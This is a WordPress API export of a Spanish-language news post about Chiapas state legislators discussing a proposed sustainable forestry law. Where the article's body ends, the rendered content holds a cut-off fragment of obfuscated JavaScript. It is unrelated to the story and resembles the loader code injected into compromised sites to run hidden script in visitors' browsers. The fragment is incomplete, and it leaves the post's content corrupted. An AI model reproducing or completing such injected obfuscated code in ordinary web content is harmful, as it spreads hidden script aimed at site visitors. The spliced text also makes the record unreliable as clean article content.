{"id":845,"date":"2022-03-24T02:18:34","date_gmt":"2022-03-24T02:18:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=845"},"modified":"2022-03-24T02:18:36","modified_gmt":"2022-03-24T02:18:36","slug":"congreso-analiza-mecanismos-de-proteccion-al-medio-ambiente-nango-molina","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=845","title":{"rendered":"Congreso analiza mecanismos de protecci\u00f3n al medio ambiente: Nango Molina"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/Reunion-Comisiones-Unidas-Cambio-climatico-y-Bosques-y-Selvas-jmc33-1024x682.jpg\" alt=\"\" class=\"wp-image-846\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/Reunion-Comisiones-Unidas-Cambio-climatico-y-Bosques-y-Selvas-jmc33-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/Reunion-Comisiones-Unidas-Cambio-climatico-y-Bosques-y-Selvas-jmc33-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/Reunion-Comisiones-Unidas-Cambio-climatico-y-Bosques-y-Selvas-jmc33-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/Reunion-Comisiones-Unidas-Cambio-climatico-y-Bosques-y-Selvas-jmc33-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/Reunion-Comisiones-Unidas-Cambio-climatico-y-Bosques-y-Selvas-jmc33-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/Reunion-Comisiones-Unidas-Cambio-climatico-y-Bosques-y-Selvas-jmc33-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, 23 de marzo de 2022.- Para conocer y analizar la iniciativa de Ley de Desarrollo Forestal Sustentable del Estado de Chiapas, las comisiones unidas de Ecolog\u00eda y Cambio Clim\u00e1tico y Bosques y Selvas del Congreso del Estado, que presiden las diputadas Zoily Linaloe Nango Molina y Mar\u00eda Luiza L\u00f3pez S\u00e1nchez, sostuvieron una reuni\u00f3n de trabajo.<\/p>\n\n\n\n<p>Al respecto, la diputada Nango Molina, se\u00f1alo la importancia de sostener mesas de trabajo interinstitucional para conocer, analizar y debatir dicha iniciativa de ley, buscando los mejores mecanismos y acciones que protejan al medio ambiente.<\/p>\n\n\n\n<p>Recalc\u00f3 la importancia de la suma de voluntades entorno a la especial preocupaci\u00f3n por la vida de los ecosistemas. \u201cChiapas y su vocaci\u00f3n forestal debe ser un ejemplo para el Pa\u00eds y consolidarse como un pulm\u00f3n de M\u00e9xico; por ello -agreg\u00f3- la necesidad de legislar por el cuidado y protecci\u00f3n de los bosques, selvas, afluentes, entre otros&#8221;.<\/p>\n\n\n\n<p>Por su parte, la diputada L\u00f3pez S\u00e1nchez, plasm\u00f3 la importancia que tiene el tema de la reforestaci\u00f3n, as\u00ed mismo la continuidad de las acciones que se emprenden por parte de las autoridades en la materia y aplaudi\u00f3 la iniciativa de ley, ya que crea mecanismos de acci\u00f3n en materia ambiental.<\/p>\n\n\n\n<p>En esta exposici\u00f3n acudieron tambi\u00e9n los legisladores Citlaly Isabel de Le\u00f3n Villard, Mar\u00eda Roselia Jim\u00e9nez P\u00e9rez, Floralma G\u00f3mez S\u00e1ntiz, y Yolanda Correa Gonz\u00e1lez, quienes forman parte de las dos comisiones anteriormente mencionadas y que hicieron sus aportaciones al respecto.<\/p>\n\n\n\n<p>Al encuentro, asistieron los funcionarios Yacundo Aaron Couti\u00f1o Estrada, Susecretario de Desarrollo Forestal y Jardines Bot\u00e1nicos; Edgar Dar\u00edo Camacho, Asesor jur\u00eddico de la Secretar\u00eda de Protecci\u00f3n Civil y Jos\u00e9 Mar\u00eda Gonz\u00e1lez Mac\u00edas, jefe de la unidad Jur\u00eddica de la Secretar\u00eda del Medio Ambiente e Historia Natural.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, 23 de marzo de 2022.- Para conocer y analizar la iniciativa de Ley de Desarrollo Forestal Sustentable del Estado de Chiapas, las comisiones unidas de Ecolog\u00eda y Cambio Clim\u00e1tico y Bosques y Selvas del Congreso del Estado, que presiden las diputadas Zoily Linaloe Nango Molina y Mar\u00eda Luiza L\u00f3pez S\u00e1nchez, sostuvieron una reuni\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":846,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-845","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/845","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=845"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/845\/revisions"}],"predecessor-version":[{"id":847,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/845\/revisions\/847"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/846"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=845"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=845"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=845"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}